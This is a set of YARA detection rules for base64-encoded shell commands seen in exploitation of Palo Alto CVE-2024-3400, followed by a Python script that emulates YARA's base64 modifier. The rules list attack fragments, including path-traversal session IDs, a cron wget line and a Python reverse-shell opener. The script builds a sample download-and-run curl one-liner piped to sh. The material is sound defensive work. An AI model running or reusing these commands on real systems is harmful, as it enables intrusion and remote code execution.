Yara Rule - Detects suspicious base64 encoded shell commands (as seen in Palo Alto CVE-2024-3400 exploitation)
Yara definition.
Author: Christian Burkard
Reference: Internal Research

Meta fields and strings, grouped by rule:

```yara
date = "2024-04-15"
modified = "2024-04-18"
score = 70
$x1 = "cmd = base64.b64decode(rst.group"
$x2 = "f.write(\"/*\"+output+\"*/\")"
$x3 = "* * * * * root wget -qO- http://"
$x4 = "rm -f /var/appweb/sslvpndocs/global-protect/*.css"
$x5a = "failed to unmarshal session(../" // https://security.paloaltonetworks.com/CVE-2024-3400
$x5b = "failed to unmarshal session(./../" // customer data
$x6 = "rm -rf /opt/panlogs/tmp/device_telemetry/minute/*" base64
$x7 = "$(uname -a) > /var/" base64

date = "2024-04-15"
score = 70
$x1 = "SESSID=../../../../opt/panlogs/"
$x2 = "SESSID=./../../../../opt/panlogs/"
$sa1 = "SESSID=../../../../"
$sa2 = "SESSID=./../../../../"
$sb2 = "${IFS}"

date = "2024-04-18"
score = 75
$sa1 = "curl http" base64
$sa2 = "wget http" base64
$sb1 = "chmod 777 " base64
$sb2 = "/tmp/" base64

date = "2024-04-15"
score = 65
$x1 = "import sys,socket,os,pty;s=socket.socket("

date = "2024-04-18"
score = 75
$s1 = "curl http://" base64
$s2 = "wget http://" base64
$s3 = ";chmod 777 " base64
$s4 = "/tmp/" base64
```
[https://github.com/Neo23x0/signature-base/commit/415fb41176f2c17139fa088ff436cae5fc0cf111](https://github.com/Neo23x0/signature-base/commit/415fb41176f2c17139fa088ff436cae5fc0cf111)
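What the `base64` keyword on the `$s1`..`$s4` strings above actually does, as an added example (my own Python, not code from the rule file or from signature-base): plaintext is base64-encoded in 3-byte groups, so a command fragment can start at any of three group offsets and produce three different encodings. The script below generates the three alignment variants of each rule string, strips the characters whose value depends on bytes outside the fragment, and scans input for them, which is the technique YARA's modifier is built on, reimplemented independently here rather than taken from YARA. The sample one-liner, the IP 203.0.113.5 (documentation range) and the benign input are constructed for the demonstration, not captured traffic.

```python
import base64

# The four `base64`-modified strings from the rule listed above (the $s1..$s4 set).
RULE_STRINGS = {
    "s1": b"curl http://",
    "s2": b"wget http://",
    "s3": b";chmod 777 ",
    "s4": b"/tmp/",
}

# Number of leading base64 characters that share bits with k prepended bytes:
# k=1 affects characters 0-1, k=2 affects characters 0-2.
_LEADING_CHARS_TO_DROP = (0, 2, 3)


def base64_variants(s: bytes) -> list:
    """Return the three alignment variants of `s` as it can appear inside a
    longer base64 stream.

    For each group offset k (0, 1, 2) we prepend k zero bytes, encode, and drop
    the leading and trailing characters whose value also depends on plaintext
    bytes outside `s`.  Independent reimplementation of the technique behind
    YARA's `base64` string modifier, not YARA's own code.
    """
    variants = []
    for k in range(3):
        enc = base64.b64encode(b"\x00" * k + s).decode("ascii").rstrip("=")
        enc = enc[_LEADING_CHARS_TO_DROP[k]:]
        if (k + len(s)) % 3:
            # the final character mixes in bits of the next plaintext byte
            enc = enc[:-1]
        variants.append(enc)
    return variants


def scan(data: bytes, strings=RULE_STRINGS) -> dict:
    """Emulate a set of `base64`-modified YARA strings over `data`.

    Returns {identifier: [offsets]} for every string that matched in any of
    its three alignments, so a condition such as "2 of them" can be
    evaluated on the result.
    """
    hits = {}
    for ident, plain in strings.items():
        offsets = []
        for variant in base64_variants(plain):
            needle = variant.encode("ascii")
            pos = data.find(needle)
            while pos != -1:
                offsets.append(pos)
                pos = data.find(needle, pos + 1)
        if offsets:
            hits[ident] = sorted(offsets)
    return hits


# Constructed sample, not captured traffic: a download-and-run one-liner the
# way it would be wrapped to keep the command out of cleartext (IP from the
# 203.0.113.0/24 documentation range).
SAMPLE_CMD = b"curl http://203.0.113.5/a -o /tmp/a;chmod 777 /tmp/a;/tmp/a"
SAMPLE_ENCODED = b"echo " + base64.b64encode(SAMPLE_CMD) + b" | base64 -d | sh"

# Constructed benign input: base64 of a harmless repeated message.
BENIGN = base64.b64encode(b"hello world " * 4)


if __name__ == "__main__":
    for ident, plain in RULE_STRINGS.items():
        print(f"{ident} {plain!r}: {base64_variants(plain)}")
    print("sample:", scan(SAMPLE_ENCODED))   # s1, s3, s4 match; s2 does not
    print("benign:", scan(BENIGN))           # {}
```

Two things worth noticing when running it. The `/tmp/` variants are only six characters long, which is why a string like that is only useful in combination with the others rather than as a match on its own. The trimming here is deliberately conservative (every character that shares bits with the following plaintext byte is dropped), so a variant can be one character shorter than the one YARA itself generates for the same alignment; it then matches a superset of what YARA matches, which is the safe direction for a detection.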